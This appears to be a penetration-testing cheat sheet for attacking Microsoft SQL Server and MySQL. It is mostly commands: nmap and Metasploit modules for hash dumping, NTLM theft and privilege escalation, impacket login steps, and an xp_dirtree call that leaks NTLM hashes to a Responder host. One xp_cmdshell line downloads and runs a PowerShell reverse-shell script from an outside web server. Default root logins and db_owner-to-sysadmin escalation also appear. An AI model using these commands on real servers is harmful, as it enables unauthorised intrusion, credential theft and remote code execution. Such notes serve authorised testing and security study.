The DAC port is used to connect to the database instance when normal connection attempts fail, for example, when server is hanging, out of memory or in other bad states. In addition, the DAC port provides an admin with access to system objects otherwise not accessible over normal connections.
The DAC feature is accessible on the loopback adapter per default, but can be activated for remote access by setting the 'remote admin connection' configuration value to 1. In some cases, when DAC has been remotely enabled but later disabled, the sql browser service may incorrectly report it as available.
sudo nmap -sU -p 1434 --script ms-sql-dac <ip>
Query (with credentials)
Automated
Queries Microsoft SQL Server (ms-sql) instances for a list of databases, linked servers, and configuration settings.
# Dumps the password hashes from an MS-SQL server in a format suitable
# Credentials required
ms-sql-dump-hashes
# Queries Microsoft SQL Server (ms-sql) instances for a list of databases a user hasaccess to.
# Credentials required
ms-sql-hasdbaccess
# Runs a query against Microsoft SQL Server (ms-sql).
# Credentials required.
ms-sql-query
# Queries Microsoft SQL Server (ms-sql) for a list of tables per database.
# Credentials required
ms-sql-tables
# Attempts to run a command using the command shell of Microsoft SQL Server (ms-sql)
# Credentials required
ms-sql-xp-cmdshell
Metasploit Modules:
#Set USERNAME, RHOSTS and PASSWORD
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used
â
#Steal NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder
â
#Info gathering
msf> use admin/mssql/mssql_enum #Security checks
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
â
#Search for insteresting data
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
â
#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin
â
#Code execution
msf> use admin/mssql/mssql_exec #Execute commands
msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload
â
#Add new admin user from meterpreter session
msf> use windows/manage/mssql_local_auth_bypass
impacket mssqlclient:
mssqlclient.py -db volume -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP> #Recommended -windows-auth when you are going to use a domain. use as domain the netBIOS name of the machine
â
#Once logged in you can run queries:
SQL> select @@ version;
â
#Steal NTLM hash
sudo responder -I <interface> #Run that in other console
SQL> exec master..xp_dirtree '\\<YOUR_RESPONDER_IP>\test' #Steal the NTLM hash, crack it with john or hashcat
â
#Try to enable code execution
SQL> enable_xp_cmdshell
â
#Execute code, 2 sintax, for complex and non complex cmds
SQL> xp_cmdshell whoami /all
SQL> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'
mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)
mysql -u root -h 127.0.0.1 -e 'show databases;'
Remote:
mysql -h <Hostname> -u root
mysql -h <Hostname> -u user@target-host
MSSQL - SMB Relay Attack
If we are in the local network we can run an MitM attack and grab NTLM hashes by setting up a fake SQL server and making the service authenticate against our server.
Stored Procedures (db_owner to sysadmin)
if we have the credentials of a DB user we can become sysadmin and execute commands remotely:
Metasploit
use auxiliary/admin/mssql/mssql_esclate_dbowner
set rhost 172.20.10.2
set rport 1433
set username db1_owner
set password MyPassword!
Stored Procedures (user impersonation)
This technique is mostly used for privilege escalation.
